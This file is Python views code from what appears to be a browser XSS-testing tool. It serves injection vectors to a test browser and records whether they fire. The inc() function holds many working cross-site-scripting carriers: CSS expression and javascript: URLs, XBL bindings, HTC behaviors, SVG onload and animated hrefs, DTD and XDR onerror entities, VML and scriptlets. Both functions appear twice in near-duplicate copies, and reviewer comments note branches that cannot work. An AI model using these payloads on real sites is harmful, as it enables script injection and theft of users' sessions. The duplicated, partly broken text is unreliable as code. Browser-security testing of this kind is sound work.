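def _record_test_result(browser, vector, context, encoding, result):
    """Create or update the Test row keyed on (browser, vector, context, encoding).

    Args:
        browser, vector, context, encoding: the model instances the row keys on.
        result: the status string to store, e.g. ``"PASS"`` or ``"SENT"``.

    Returns:
        The saved ``Test`` instance.
    """
    # Take the first matching row if one exists, otherwise create a fresh one.
    matches = Test.objects.filter(browser=browser, vector=vector, context=context, encoding=encoding)
    if matches:
        entry = matches[0]
        entry.result = result
    else:
        entry = Test(browser=browser, vector=vector, context=context, encoding=encoding, result=result)
    entry.save()
    return entry


def test(request, vector_id, context_id, encoding_id, verdict):
    """Serve one test vector to the browser under test, or record its verdict.

    The browser is the ``Browser`` row whose id is stored in the session under
    ``"browser"``; ``vector_id``, ``context_id`` and ``encoding_id`` select the
    ``Vector``, ``WebContext`` and ``Encoding`` rows.  ``verdict`` picks the action:

    * ``"pass"``    -- record PASS and redirect to ``/test/next``.
    * ``"xhrpass"`` -- record PASS and answer with a short plain-text body.
    * ``"imgpass"`` -- record PASS and answer with ``static/img/pass.png``.
    * anything else -- build the vector, record SENT and serve the vector
      embedded in the web context's source, typed ``<mimetype>; <web_encoding>``.

    Raises:
        KeyError: the session has no ``"browser"`` entry.
        <Model>.DoesNotExist: one of the ids matches no row (Django answers 500, not 404).
    """
    b = Browser.objects.get(id=request.session["browser"])
    v = Vector.objects.get(id=vector_id)
    wc = WebContext.objects.get(id=context_id)
    enc = Encoding.objects.get(id=encoding_id)

    if verdict == "pass":
        _record_test_result(b, v, wc, enc, "PASS")
        return HttpResponseRedirect("/test/next")

    if verdict == "xhrpass":
        _record_test_result(b, v, wc, enc, "PASS")
        return HttpResponse("test n°" + str(vector_id) + " passed via xhttprequest")

    if verdict == "imgpass":
        _record_test_result(b, v, wc, enc, "PASS")
        # Relative path, resolved against the process working directory (the
        # deployment-path issue the original TODO referred to).  The context
        # manager closes the handle; the original left it open.
        with open("static/img/pass.png", "rb") as image_file:
            image_data = image_file.read()
        return HttpResponse(image_data, mimetype="image/png")

    # Any other verdict value: build and deliver the vector.
    baseurl = request.build_absolute_uri("/")
    domain = Site.objects.get_current()
    xss_instance = build_vector(
        v,
        test_payload(vector_id, context_id, encoding_id, baseurl, domain),
        "test",
        context_id,
        encoding_id,
        baseurl,
    )
    # Mark the vector as delivered before serving it; presumably the browser
    # then reports back through one of the *pass verdicts above.
    _record_test_result(b, v, wc, enc, "SENT")
    # The context source carries a %(xss)s slot for the vector.
    source = wc.source % {"xss": xss_instance}
    # "string_escape" is a Python 2 codec and ``mimetype=`` (above) is a
    # pre-1.7 Django keyword; both are kept as-is for the targeted runtime.
    return HttpResponse(
        source.decode("string_escape"),
        content_type=wc.mimetype + "; " + enc.web_encoding,
    )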
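def _record_test_result(browser, vector, context, encoding, result):
    """Create or update the Test row keyed on (browser, vector, context, encoding).

    Args:
        browser, vector, context, encoding: the model instances the row keys on.
        result: the status string to store, e.g. ``"PASS"`` or ``"SENT"``.

    Returns:
        The saved ``Test`` instance.
    """
    # Take the first matching row if one exists, otherwise create a fresh one.
    matches = Test.objects.filter(browser=browser, vector=vector, context=context, encoding=encoding)
    if matches:
        entry = matches[0]
        entry.result = result
    else:
        entry = Test(browser=browser, vector=vector, context=context, encoding=encoding, result=result)
    entry.save()
    return entry


def test(request, vector_id, context_id, encoding_id, verdict):
    """Serve one test vector to the browser under test, or record its verdict.

    The browser is the ``Browser`` row whose id is stored in the session under
    ``'browser'``; ``vector_id``, ``context_id`` and ``encoding_id`` select the
    ``Vector``, ``WebContext`` and ``Encoding`` rows.  ``verdict`` picks the action:

    * ``"pass"``    -- record PASS and redirect to ``/test/next``.
    * ``"xhrpass"`` -- record PASS and answer with a short plain-text body.
    * ``"imgpass"`` -- record PASS and answer with ``static/img/pass.png``.
    * anything else -- build the vector, record SENT and serve the vector
      embedded in the web context's source, typed ``<mimetype>; <web_encoding>``.

    Raises:
        KeyError: the session has no ``'browser'`` entry.
        <Model>.DoesNotExist: one of the ids matches no row (Django answers 500, not 404).
    """
    b = Browser.objects.get(id=request.session['browser'])
    v = Vector.objects.get(id=vector_id)
    wc = WebContext.objects.get(id=context_id)
    enc = Encoding.objects.get(id=encoding_id)

    if verdict == "pass":
        _record_test_result(b, v, wc, enc, "PASS")
        return HttpResponseRedirect("/test/next")

    if verdict == "xhrpass":
        _record_test_result(b, v, wc, enc, "PASS")
        return HttpResponse("test n°" + str(vector_id) + " passed via xhttprequest")

    if verdict == "imgpass":
        _record_test_result(b, v, wc, enc, "PASS")
        # Relative path, resolved against the process working directory (the
        # deployment-path issue the original TODO referred to).  The context
        # manager closes the handle; the original left it open.
        with open("static/img/pass.png", "rb") as image_file:
            image_data = image_file.read()
        return HttpResponse(image_data, mimetype="image/png")

    # Any other verdict value: build and deliver the vector.
    baseurl = request.build_absolute_uri("/")
    domain = Site.objects.get_current()
    xss_instance = build_vector(
        v,
        test_payload(vector_id, context_id, encoding_id, baseurl, domain),
        "test",
        context_id,
        encoding_id,
        baseurl,
    )
    # Mark the vector as delivered before serving it; presumably the browser
    # then reports back through one of the *pass verdicts above.
    _record_test_result(b, v, wc, enc, "SENT")
    # The context source carries a %(xss)s slot for the vector.
    source = wc.source % {"xss": xss_instance}
    # 'string_escape' is a Python 2 codec and ``mimetype=`` (above) is a
    # pre-1.7 Django keyword; both are kept as-is for the targeted runtime.
    return HttpResponse(
        source.decode('string_escape'),
        content_type=wc.mimetype + "; " + enc.web_encoding,
    )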
def inc(request, context, vector_id, context_id, encoding_id, type):
    """Serve a payload wrapped as an includable resource of the requested ``type``.

    ``context`` selects the payload: ``"xss"`` takes ``xss_payload()``, ``"test"``
    takes ``test_payload(...)`` for the given vector/context/encoding ids, and
    anything else answers ``"WTF BBQ?"``.  ``type`` (a URL-routed parameter name,
    so it keeps shadowing the builtin) selects the wrapper: css, js, jpg, htc,
    html, xbl, svg, svg2, svg3, svg4, xxe, dtd, xdr, evt, vml, sct, php; any other
    value answers ``"fail !"``.

    Most branches run the payload through ``eval_payload`` and %-format it into a
    template; js, jpg and html use ``source`` verbatim.  Branches that write into
    ``response`` also set its Content-type header; branches that return a fresh
    ``HttpResponse`` leave the content type at Django's default.
    """
    # return a given payload as an include like .js or .css etc...
    response = HttpResponse()
    if context == "xss":
        source = xss_payload()
    elif context == "test":
        baseurl = request.build_absolute_uri("/")
        domain = Site.objects.get_current()
        source = test_payload(vector_id, context_id, encoding_id, baseurl, domain)
    else:
        return HttpResponse("WTF BBQ?")
    if type == "css":
        css = """ background-image: url('javascript:%(eval_p)s;'); background-image: expression(%(eval_p)s); -moz-binding:url("%(xssmoz)s"); }{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}"""
        eval_p = eval_payload(source)
        response['Content-type'] = 'text/css'
        # The xssmoz slot is always filled with an empty string here.
        response.write(css % {'eval_p': eval_p, 'xssmoz': ''})
        return response
    elif type == "js":
        response['Content-type'] = 'application/javascript'
        response.write(source)
        return response
    elif type == "jpg":
        response['Content-type'] = 'image/jpeg'
        response.write(source)
        return response
    elif type == "htc":
        eval_p = eval_payload(source)
        # NOTE(review): ``source`` is concatenated into the template *before*
        # the %-formatting below, so a literal '%' in source would make that
        # format call raise -- verify whether payloads can contain one.
        htc = """ <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x> <PUBLIC:COMPONENT TAGNAME="xss"> <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> </PUBLIC:COMPONENT> <SCRIPT> function main() { """ + source + """; } </SCRIPT>"""
        response['Content-type'] = 'text/plain'
        response.write(htc % { 'eval_p': eval_p, })
        return response
    elif type == "html":
        # Rendered through the payload.html template; source is passed as-is.
        return render_to_response('payload.html', { 'source': source, })
    elif type == "xbl":
        eval_p = eval_payload(source)
        xbl = """ <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>"""
        return HttpResponse(xbl % { 'eval_p': eval_p, })
    elif type == "svg":
        eval_p = eval_payload(source)
        svg = """ <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" 
type="submit"/></form> """
        response['Content-type'] = 'image/svg+xml'
        response.write(svg % { 'eval_p': eval_p, })
        return response
    elif type == "svg2":
        svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>"""
        response['Content-type'] = 'image/svg+xml'
        eval_p = eval_payload(source)
        response.write(svg % { 'eval_p': eval_p, })
        return response
    elif type == "svg3":
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>"""
        response['Content-type'] = 'image/svg+xml'
        eval_p = eval_payload(source)
        response.write(svg % { 'eval_p': eval_p, })
        return response
    elif type == "svg4":
        # NOTE(review): this template has no %(eval_p)s slot and a fixed body,
        # so the computed payload is never substituted into it.
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>"""
        response['Content-type'] = 'image/svg+xml'
        eval_p = eval_payload(source)
        response.write(svg % { 'eval_p': eval_p, })
        return response
    elif type == "xxe":
        xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(xxe % { 'eval_p': eval_p, })
    elif type == "dtd":
        dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">"""
        eval_p = eval_payload(source)
        return HttpResponse(dtd % { 'eval_p': eval_p, })
    elif type == "xdr":
        xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>"""
        eval_p = eval_payload(source)
        return HttpResponse(xdr % { 'eval_p': eval_p, })
    elif type == "evt":
        evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(evt % { 'eval_p': eval_p, })
    elif type == "vml":
        # NOTE(review): the "100%;" and '100%"' inside the style attribute are
        # not escaped as "%%", so the %-formatting below raises ValueError
        # (unsupported format character) -- this branch cannot succeed as written.
        vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>"""
        eval_p = eval_payload(source)
        return HttpResponse(vml % { 'eval_p': eval_p, })
    elif type == "sct":
        sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>"""
        eval_p = eval_payload(source)
        return HttpResponse(sct % { 'eval_p': eval_p, })
    elif type == "php":
        # A fixed event-stream body; eval_p is computed but never written out.
        event = """Event: load\ndata: \n\n"""
        eval_p = eval_payload(source)
        response['Content-type'] = 'application/x-dom-event-stream'
        response.write(event)
        return response
    else:
        return HttpResponse("fail !")
def inc(request, context, vector_id, context_id, encoding_id, type):
    """Serve a payload wrapped as an includable resource of the requested ``type``.

    ``context`` selects the payload: ``"xss"`` takes ``xss_payload()``, ``"test"``
    takes ``test_payload(...)`` for the given vector/context/encoding ids, and
    anything else answers ``"WTF BBQ?"``.  ``type`` (a URL-routed parameter name,
    so it keeps shadowing the builtin) selects the wrapper: css, js, jpg, htc,
    html, xbl, svg, svg2, svg3, svg4, xxe, dtd, xdr, evt, vml, sct, php; any other
    value answers ``"fail !"``.

    Most branches run the payload through ``eval_payload`` and %-format it into a
    template; js, jpg and html use ``source`` verbatim.  Branches that write into
    ``response`` also set its Content-type header; branches that return a fresh
    ``HttpResponse`` leave the content type at Django's default.
    """
    # return a given payload as an include like .js or .css etc...
    response = HttpResponse()
    if context == "xss":
        source = xss_payload()
    elif context == "test":
        baseurl = request.build_absolute_uri("/")
        domain = Site.objects.get_current()
        source = test_payload(vector_id, context_id, encoding_id, baseurl, domain)
    else:
        return HttpResponse("WTF BBQ?")
    if type == "css":
        css = """ background-image: url('javascript:%(eval_p)s;'); background-image: expression(%(eval_p)s); -moz-binding:url("%(xssmoz)s"); }{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}"""
        eval_p = eval_payload(source)
        response["Content-type"] = "text/css"
        # The xssmoz slot is always filled with an empty string here.
        response.write(css % {"eval_p": eval_p, "xssmoz": ""})
        return response
    elif type == "js":
        response["Content-type"] = "application/javascript"
        response.write(source)
        return response
    elif type == "jpg":
        response["Content-type"] = "image/jpeg"
        response.write(source)
        return response
    elif type == "htc":
        eval_p = eval_payload(source)
        # NOTE(review): ``source`` is concatenated into the template *before*
        # the %-formatting below, so a literal '%' in source would make that
        # format call raise -- verify whether payloads can contain one.
        htc = (
            """ <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x> <PUBLIC:COMPONENT TAGNAME="xss"> <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> </PUBLIC:COMPONENT> <SCRIPT> function main() { """
            + source
            + """; } </SCRIPT>"""
        )
        response["Content-type"] = "text/plain"
        response.write(htc % {"eval_p": eval_p})
        return response
    elif type == "html":
        # Rendered through the payload.html template; source is passed as-is.
        return render_to_response("payload.html", {"source": source})
    elif type == "xbl":
        eval_p = eval_payload(source)
        xbl = """ <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>"""
        return HttpResponse(xbl % {"eval_p": eval_p})
    elif type == "svg":
        eval_p = eval_payload(source)
        svg = """ <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form> 
"""
        response["Content-type"] = "image/svg+xml"
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "svg2":
        svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>"""
        response["Content-type"] = "image/svg+xml"
        eval_p = eval_payload(source)
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "svg3":
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>"""
        response["Content-type"] = "image/svg+xml"
        eval_p = eval_payload(source)
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "svg4":
        # NOTE(review): this template has no %(eval_p)s slot and a fixed body,
        # so the computed payload is never substituted into it.
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>"""
        response["Content-type"] = "image/svg+xml"
        eval_p = eval_payload(source)
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "xxe":
        xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(xxe % {"eval_p": eval_p})
    elif type == "dtd":
        dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">"""
        eval_p = eval_payload(source)
        return HttpResponse(dtd % {"eval_p": eval_p})
    elif type == "xdr":
        xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>"""
        eval_p = eval_payload(source)
        return HttpResponse(xdr % {"eval_p": eval_p})
    elif type == "evt":
        evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(evt % {"eval_p": eval_p})
    elif type == "vml":
        # NOTE(review): the "100%;" and '100%"' inside the style attribute are
        # not escaped as "%%", so the %-formatting below raises ValueError
        # (unsupported format character) -- this branch cannot succeed as written.
        vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>"""
        eval_p = eval_payload(source)
        return HttpResponse(vml % {"eval_p": eval_p})
    elif type == "sct":
        sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>"""
        eval_p = eval_payload(source)
        return HttpResponse(sct % {"eval_p": eval_p})
    elif type == "php":
        # A fixed event-stream body; eval_p is computed but never written out.
        event = """Event: load\ndata: \n\n"""
        eval_p = eval_payload(source)
        response["Content-type"] = "application/x-dom-event-stream"
        response.write(event)
        return response
    else:
        return HttpResponse("fail !")